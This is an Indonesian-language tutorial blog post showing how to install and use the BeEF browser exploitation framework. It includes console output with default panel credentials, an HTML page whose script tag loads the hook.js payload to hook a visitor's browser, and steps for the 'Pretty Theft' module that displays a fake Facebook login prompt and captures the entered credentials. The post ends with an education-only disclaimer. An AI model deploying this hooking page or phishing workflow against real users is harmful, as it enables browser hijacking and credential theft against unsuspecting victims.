BeEF adalah singkatan dari Browser Exploitation Framework. Alat ini dirancang untuk mengeksplorasi kerentanan di browser dan mengujinya.
Peretasan BeEF melibatkan dan mengaitkan satu atau lebih browser web dan menggunakannya untuk meluncurkan modul perintah untuk menyerang sistem target di dalam browser.
BeEF bekerja dengan menggunakan file JavaScript bernama hook.js. Tugas penyerang adalah menemukan cara untuk menjalankan JavaScript ini di browser korban.
Setelah dijalankan, dia akan memiliki kendali atas browser mereka dalam berbagai aspek. Ada banyak cara dia bisa mengeksekusi skrip ini. Misalnya, dia dapat membuat halaman phishing dengan pengaitkannya di dalam kode HTML
Kali ini Saya akan mencontohkan dengan menggunakan halam phishing. Untuk tahap awal mari terlebih dahulu menginstall BeEF.
Install BeEF Framework
OS Linux diperlukan untuk menginstal BeEF di mesin lokal Anda. Anda dapat langsung menginstal paket dengan perintah berikut:
apt install beef-xss
Gunakan perintah berikut untuk menjalankan BeEF:
beef-xss
[22:07:06][*] BeEF is loading. Wait a few seconds... [22:07:09][*] 8 extensions enabled: [22:07:09] | Proxy [22:07:09] | Demos [22:07:09] | XSSRays [22:07:09] | Events [22:07:09] | Admin UI [22:07:09] | Social Engineering [22:07:09] | Network [22:07:09] |_ Requester [22:07:09][*] 303 modules enabled. [22:07:09][*] 1 network interfaces were detected. [22:07:09][*] running on network interface: [22:07:09] | Hook URL: http://127.0.0.1:3000/hook.js [22:07:09] |_ UI URL: http://127.0.0.1:3000/ui/panel [22:07:09][*] RESTful API key: 43f6880f37e0c0b41b1e98935862bb2cf6a63266 [22:07:09][!] [GeoIP] Could not find MaxMind GeoIP database: [22:07:09] |_ Run geoipupdate to install [22:07:09][*] HTTP Proxy: http://127.0.0.1:6789 [22:07:09][*] BeEF server started (press control+c to stop)
Disini kita bisa melihat ada dua link penting, yaitu:
- Hook URL: http://127.0.0.1:3000/hook.js
- UI URL: http://127.0.0.1:3000/ui/panel
"Hook URL" adalah JavaScript yang diperlukan untuk dijalankan korban Anda.
"UI URL" adalah antarmuka web untuk BeEF tempat Anda dapat memantau dan melakukan serangan.
Anda dapat mengakses antarmuka web BeEF dengan mengetikkan URL berikut di browser web Anda:
http://127.0.0.1:3000/ui/panel
Secara default username nya adalah beef dan password beef
Setelah berhasil masuk, Anda akan melihat halaman "Getting Started" dengan informasi tentang cara kerja BeEF. Dari sini Anda dapat melihat browser yang hacked/hooked baik online maupun offline.
Kaitkan Browser Target
Agar browser web menjadi "hook", Anda memerlukan klien untuk mengunjungi situs web dengan file JavaScript "hook.js".
Jadi, untuk mendemonstrasikan ini saya akan membuat halaman HTML yang sangat dasar untuk memuat file JavaScript. Ini dapat ditempatkan di server web, diletakkan di server file, dikirim melalui email ke seseorang, dll.
< html >< head >< script src = "http://127.0.0.1:3000/hook.js" type = 'text/javascript' > </ script ></ head >< body >Your browser is hooked!</body> </html> __ _ _
Seperti yang Anda lihat, browser online baru telah ditambahkan ke bagian browser terkait.
Sekarang saya memiliki browser yang terhubung, saya dapat menjalankan beberapa modul bawaan dari tab "Perintah/Commands".
Serangan Phishing
Untuk melakukan serangan phishing dasar, buka Commands > Social Engineering > Pretty Theft di antarmuka web BeEF.
Klik pada tombol Execute.
Ini akan menyebabkan halaman batas waktu sesi Facebook palsu muncul di halaman web korban, meminta kredensial pengguna.
Dan kemudian Saya akan memasukkan beberapa kredensial palsu.
Seperti yang Anda lihat “test@zyx” dan “p@ssw0rd” was recorded!
Jadi, BeEF adalah alat yang ampuh untuk mengeksploitasi browser web, dan ini adalah contoh mengapa Anda tidak boleh mengeklik tautan yang mencurigakan. Selain itu, Anda harus sangat berhati-hati dengan apa pun yang muncul di browser Anda.
Informasi ini hanya boleh digunakan untuk memperluas pengetahuan dan bukan untuk menyebabkan serangan berbahaya atau merusak.